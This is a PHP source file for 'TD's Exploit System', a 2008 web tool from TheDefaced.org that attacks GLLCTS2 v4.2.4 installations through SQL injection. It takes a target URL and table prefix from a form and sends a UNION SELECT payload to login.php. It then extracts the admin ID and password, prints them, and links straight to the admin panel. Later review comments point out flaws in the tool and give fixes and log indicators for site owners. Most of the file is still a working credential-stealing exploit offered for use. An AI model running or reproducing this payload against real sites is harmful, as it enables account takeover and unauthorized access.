<?php
// Lift PHP's execution time limit for this request (0 means "no limit").
// NOTE(review): the handler below performs a remote fetch with no timeout of its
// own, so a slow or silent remote host can hold a worker for as long as it likes.
set_time_limit(0);
// 0 keeps "ignore user abort" off: the script stops once the client disconnects.
ignore_user_abort(0);
/**
 * Build a run of HTML non-breaking-space entities.
 *
 * @param int $count How many "&nbsp;" entities to emit.
 * @return string The entity repeated $count times (empty string for 0).
 */
function add_html_space($count)
{
    return str_repeat("&nbsp;", $count);
}
/**
 * Render one content panel: heading, description line and body paragraph.
 *
 * All three arguments are inserted into the markup as-is, with no HTML
 * escaping, so callers must pass trusted markup only. The outer
 * "content" div is intentionally left open; the page footer closes it.
 *
 * @param string $title   Heading placed inside the <h1>.
 * @param string $desc    Text placed inside the "descr" div.
 * @param string $content Markup placed inside the <p>.
 * @return string The assembled HTML fragment.
 */
function write_content($title, $desc, $content)
{
    $heading = "<h1>" . $title . "</h1>";
    $summary = "<div class='descr'>" . $desc . "</div>";
    $body    = "<br><p>" . $content . "</p>";

    return "<div class='content'><div class='item'>" . $heading . $summary . $body . "</div>";
}
// Static page template. Nothing in this run reads request input; it only builds
// and prints the page chrome that surrounds the handler output further down.

// Page title, reused in the <title> tag and in the footer text.
$title = "GLLCTS2 => v4.2.4". add_html_space(1) ." SQL Injection Exploit";
// Banner / heading labels interpolated into $style below.
$header['banner'] = "TD's ESystem";
$header['main'] = "TD's Exploit System";
// Side-menu labels. $menu is an array here ...
$menu['title'] = "Exploit System";
$menu['title1'] = "Esystem Home";
$menu['link1'] = "?";
// ... and is then overwritten with the rendered menu string. The right-hand side is
// evaluated first, so the array reads still see the labels set above.
$menu = "<div class=\"sidenav\"><h1>".$menu['title']."</h1><ul><li><a href='".$menu['link1']."'>".$menu['title1']."</a></li></ul><h1>Links To TD</h1><ul><li><a href=\"http://www.thedefaced.org\">Go To TheDefaced</a></li><li><a href=\"http://www.thedefaced.org/forums/\">Go To TheDefaced Forums</a></li></ul></div>";
// Footer markup; also closes the wrapper elements opened in $style and by the
// content panel. $title is interpolated at assignment time.
$copyright = "</div><div class=\"clearer\"><span></span></div></div><br><div class=\"footer\">&copy; 2004 - 2008 <a href=\"?\">The&nbsp;Defaced Security Team.</a><br>&copy; 2008 $title By TheDefaced.org</div></span></div></div></body></html>";
// Page head and opening wrappers, followed by the rendered menu.
// NOTE(review): the stylesheet is loaded from a third-party host over plain http,
// so that host (or anyone on the network path) controls how this page renders.
// NOTE(review): the string contains closing tags (</td>, </TABLE>, </tr>, </table>,
// </form>, </a>) with no matching opening tag in this template.
$style = "<html><head><link rel=\"stylesheet\" type=\"text/css\" href=\"http://thedefaced.org/default_orig.css\" media=\"screen\"/><title>$title</title></head><body><div id=\"thedefaced\"><div class=\"container\"><span><div class=\"main\"><div class=\"header\"><div class=\"title\"><font size=\"0.1\"><a href=\"http://www.thedefaced.org\">$header[banner]</a></font></div></td></td></TABLE></td></tr></table></form></div><div class=\"footer\"><b>$header[main]</a></b></div>$menu";
// Emitted on every request, before any input is looked at.
echo $style;
// Request handler. The switch has only a default arm, so every request ends up
// here; reading $_GET['page'] when it is absent raises an undefined-index diagnostic.
switch($_GET['page']){
default:
// The form below posts a hidden field inj=run; anything else shows the form.
If($_POST['inj'] == 'run'){
echo"<div class='content'>";
echo"<div class='item'><h1>TD's Exploit System</h1>";
echo"<div class='descr'>Grabing Admin ID and Password via GLLC SQL injection.</div>";
echo"<br><p>";
// Both values come straight from the POST body and are used without validation.
$url = $_POST['url'];
$prefix = $_POST['prefix'];
// Server-side fetch of a caller-supplied URL. The query string puts a UNION SELECT
// into login.php's `detail` parameter that reads admin_id and admin_pass from the
// "<prefix>_admin" table and wraps them in '|' delimiters; the CHAR() lists spell
// the labels "ADMINID:" and "PASS:".
// NOTE(review): presumably login.php concatenates `detail` into a SQL string; that
// file is not shown here. For owners of the application: bind `detail` as a query
// parameter (prepared statement), and treat access-log entries for login.php whose
// `detail` value contains "union select" / "concat(CHAR(" as an indicator of this probe.
// NOTE(review): there is no scheme or host allow-list on $url, so anyone who can
// reach this page can make the hosting server fetch an arbitrary URL (SSRF exposure
// for whoever hosts the script). The return value is not checked for false.
$buf = file_get_contents($url."/login.php?detail='%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,concat(CHAR(124),CHAR(65,%2068,%2077,%2073,%2078,%2073,%2068,%2058),admin_id,CHAR(124),CHAR(80,%2065,%2083,%2083,%2058),admin_pass,CHAR(124)),13,14,15,16,17,18,19,20,21,22,23%20from%20".$prefix."_admin/*");
// Split the response body on the '|' delimiter and scan the pieces for the labels.
$arr = explode("|",$buf);
foreach($arr as $line){
// eregi() was deprecated in PHP 5.3 and removed in PHP 7.0.
// The brace-less outer if governs only the inner If block that follows it.
if(eregi("ADMINID:", $line))
// $adminid is not initialised before this first comparison.
If($line !=$adminid){
$adminid = $line;
// NOTE(review): text taken from the remote response is echoed without escaping, so
// the remote site controls HTML/script that runs in the browser viewing this page.
echo $adminid."<br>";
}
if(eregi("PASS:",$line))
// $pass is likewise uninitialised; only the first "PASS:" piece is kept.
If($pass == ""){
$pass = $line;
$pass_parsed = str_replace("PASS:","",$pass);
echo $pass."<br><br>";
// NOTE(review): $url and the extracted value are written into the href unescaped,
// and the value travels in a query string, where it lands in browser history and
// proxy/server logs. The link suggests admin/index.php accepts the stored value
// as a credential as-is; confirm against the application, since that would mean
// the stored secret is not a one-way password hash.
echo "<a href='$url/admin/index.php?pass=$pass_parsed'>Login</a>";
}
}
// Closes </font> and </b> elements that were never opened in this branch.
echo"</font></b></p></div>";
echo $copyright;
}else{
// Landing view: a POST form collecting the base URL and table prefix, with the
// hidden inj=run field that selects the branch above.
echo write_content("Welcome to TD's Exploit System","SQL injection exploit in GLLCTS2","<form method='post' action='?'><center><input type='hidden' name='inj' value='run'>GLLCTS2 URL(No Trailing \"/\" & Include \"http://\"):<br><input type='text' size='25' name='url'><br><br>Table Prefix:<br>". add_html_space(1) ."<input type='text' size='20' name='prefix' value='gllcts2'><br><br><input type='submit' value='Get Admin Info'></form>");
echo $copyright;
}
break;
}
?>